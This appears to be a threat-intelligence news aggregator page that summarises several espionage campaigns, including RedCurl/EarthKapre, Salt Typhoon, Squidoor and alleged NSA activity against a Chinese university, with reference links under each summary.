The RedCurl/EarthKapre APT group is actively engaged in corporate espionage, particularly targeting the legal sector. The group uses sophisticated techniques to infiltrate organizations, beginning with phishing emails disguised as Indeed-themed job applications. These emails contain malicious attachments designed to trick victims into downloading ZIP archives containing ISO image files that mimic CVs. Once the ISO image is mounted, the victim unknowingly executes a signed Adobe executable, which then sideloads the EarthKapre loader.

This loader, delivered via a legitimate Adobe executable, is the core of the attack. It establishes command and control through Cloudflare Workers. The malware uses encryption to protect its payloads and sets up a scheduled task to maintain persistence on the compromised system. The eSentire Threat Response Unit (TRU) identified this attack targeting law firms and legal services.

Recommended read:
References :
  • Information Security Buzz: eSentire’s Threat Response Unit (TRU) has uncovered a new cyber espionage campaign leveraging a legitimate Adobe executable to sideload the EarthKapre/RedCurl loader.
  • SOC Prime Blog: The nefarious cyber-espionage hacking collective tracked as EarthKapre or RedCurl APT has resurfaced to target legal sector organizations using Indeed-themed phishing.
  • Virus Bulletin: Infosec Exchange post summarizing eSentire's investigation into RedCurl/EarthKapre APT targeting legal services.
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre...
  • Know Your Adversary: 046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
  • socprime.com: RedCurl/EarthKapre APT Attack Detection: A Sophisticated Cyber-Espionage Group Uses a Legitimate Adobe Executable to Deploy a Loader
  • www.esentire.com: eSentire researchers summarise a recent investigation into an attack by the RedCurl/EarthKapre APT against an organization within the legal services industry. The group primarily targets private-sector organizations with a focus on corporate espionage.
  • securityonline.info: Stealth Attack: EarthKapre Leverages Cloud and DLL Sideloading for Data Exfiltration
  • Talkback Resources: eSentire's TRU team identified and responded to an attack targeting the Law Firms & Legal Services industry involving the EarthKapre/RedCurl loader being sideloaded through a legitimate Adobe executable, utilizing Cloudflare Workers for C2 infrastructure.
  • securityonline.info: Stealth Attack: EarthKapre Leverages Cloud and DLL Sideloading for Data Exfiltration
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre… [net] [mal]
  • securityaffairs.com: eSentire report on the RedCurl/EarthKapre APT's campaign targeting law firms, using a legitimate Adobe executable for the loader.
  • Kim Zetter: eSentire's TRU team identified and responded to an attack targeting the Law Firms & Legal Services industry involving the EarthKapre/RedCurl loader being sideloaded through a legitimate Adobe executable, utilizing Cloudflare Workers for C2 infrastructure.

drewt@secureworldexpo.com (Drew Todd)@SecureWorld News //
The Chinese state-sponsored hacking group Salt Typhoon is expanding its espionage campaign, targeting U.S. telecommunication providers and other networks globally. The group, active since at least 2019, has been breaching major companies like AT&T, Verizon, and Lumen Technologies. Between December 2024 and January 2025, Salt Typhoon compromised additional telecom networks across the globe. The attacks involve a custom utility called JumbledPath, used to stealthily monitor network traffic and potentially capture sensitive data.

Salt Typhoon gains initial access through stolen credentials and exploiting vulnerabilities in Cisco routers. Specifically, they target internet-exposed Cisco network routers, leveraging CVE-2023-20198 and CVE-2023-20273 to escalate privileges and gain root access. Once inside, they extract credentials by intercepting authentication traffic, modify network configurations, and create hidden accounts to maintain persistent access. The group's objectives include intercepting sensitive communications, tracking political activists, and stealing research from academic institutions.

Recommended read:
References :
  • bsky.app: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • BleepingComputer: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • securityaffairs.com: Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers
  • www.bleepingcomputer.com: state-sponsored hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Anonymous ???????? :af:: state-sponsored hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • BleepingComputer: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Carly Page: state-sponsored hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Blog: New Details: Salt Typhoon Used Leaked Creds in Telecom Attack
  • SecureWorld News: Chinese cyber espionage group Salt Typhoon has made headlines in the last year, breaching major , including AT&T, Verizon, and Lumen Technologies.
  • cyberscoop.com: Salt Typhoon gained initial access to telecoms through Cisco devices
  • www.bleepingcomputer.com: Chinese hackers breach more U.S. telecoms via unpatched Cisco routers
  • gbhackers.com: Gbhackers news on Salt Typhoon Hackers Exploit Cisco Vulnerability
  • www.the420.in: The 420 news on Chinese Hackers Target US Telecom Giants

@www.bleepingcomputer.com //
Chinese APT groups are actively targeting U.S. telecom providers and European healthcare organizations using sophisticated cyberattacks. The attacks involve custom malware, such as JumbledPath used by Salt Typhoon to spy on U.S. telecom networks, and the exploitation of vulnerabilities like the Check Point flaw (CVE-2024-24919). These campaigns are characterized by the deployment of advanced tools like ShadowPad and NailaoLocker ransomware, indicating a blend of espionage and financially-motivated cybercrime.

These threat actors gain initial access through exploited vulnerabilities, then move laterally within the networks using techniques like RDP to obtain elevated privileges. The attackers then deploy ShadowPad and PlugX, before deploying the NailaoLocker ransomware in the final stages, encrypting files and demanding Bitcoin payments. These findings highlight the evolving tactics of Chinese APT groups and the challenges in attributing these attacks, given the blurring lines between state-sponsored espionage and financially driven operations.

Recommended read:
References :

Aman Mishra@gbhackers.com //
A new malware campaign, named "Squidoor," is targeting governments, defense, telecommunications, education, and aviation sectors in Southeast Asia and South America. Researchers at Palo Alto Networks, Lior Rochberger and Tom Fakterman, have analyzed the backdoor, attributing it to a suspected Chinese threat actor known as CL-STA-0049. Squidoor is a multi-vector modular backdoor designed for stealth and adaptability.

This sophisticated malware exploits techniques such as abusing cdb.exe, Outlook API, DNS, and ICMP tunneling for command and control (C2). Attackers gain initial access by exploiting vulnerabilities and deploying web shells. The backdoor is dropped using weaponized Excel documents and deploys a stealthy RAT and additional payloads. Squidoor employs LOLBAS techniques, like using Microsoft’s Console Debugger, to load shellcode directly into memory, bypassing traditional antivirus detection.

Recommended read:
References :
  • gbhackers.com: Squidoor: Multi-Vector Malware Exploiting Outlook API, DNS & ICMP Tunneling for C2
  • Virus Bulletin: Palo Alto Networks researchers Lior Rochberger & Tom Fakterman analyse Squidoor. The backdoor was used in a malicious activity cluster targeting governments, defence, telecommunication, education and aviation sectors in Southeast Asia and South America.
  • Anonymous ???????? :af:: Have you heard of the rarely observed technique abusing cdb.exe? A new backdoor called Squidoor utilizes this technique, and is in the toolkit of a suspected Chinese threat actor targeting multiple countries and sectors.
  • Talkback Resources: Squidoor: Suspected Chinese Threat Actor’s Backdoor Targets Global Organizations
  • www.cysecurity.news: New Malware Targets Aviation and Satellite Firms

@gbhackers.com //
Chinese cybersecurity entities are accusing the U.S. National Security Agency (NSA) of orchestrating a multi-year cyber espionage campaign against Northwestern Polytechnical University (NPU), a leading Chinese institution specializing in aerospace and defense research. The allegations, published by organizations such as Qihoo 360 and the National Computer Virus Emergency Response Center (CVERC), claim that the NSA’s Tailored Access Operations (TAO) unit, referred to as “APT-C-40” by Chinese sources, conducted the attack in 2022. The university disclosed the breach in June 2022, reporting phishing emails targeting staff and students as the initial vector.

According to Chinese investigators, the NSA allegedly deployed over 40 malware strains and leveraged zero-day vulnerabilities to gain access. Tools such as NOPEN and SECONDDATE, previously linked to the NSA, were reportedly used to establish persistence and intercept network traffic. Chinese cybersecurity firms attribute the attack to the NSA based on forensic analysis and operational patterns, noting that nearly all attack activity occurred during U.S. business hours, with no activity on weekends or U.S. holidays. A misconfigured script also revealed directory paths linked to TAO’s tools, including a Linux directory associated with NSA operations.

Recommended read:
References :
  • discuss.privacyguides.net: An inside look at NSA (Equation Group) attack on China
  • gbhackers.com: NSA Allegedly Hacked Northwestern Polytechnical University, China Claims
  • Talkback Resources: China’s Cybersecurity Firms Reveal Alleged NSA (Equation Group) Tactics in University Hack [for] [mal]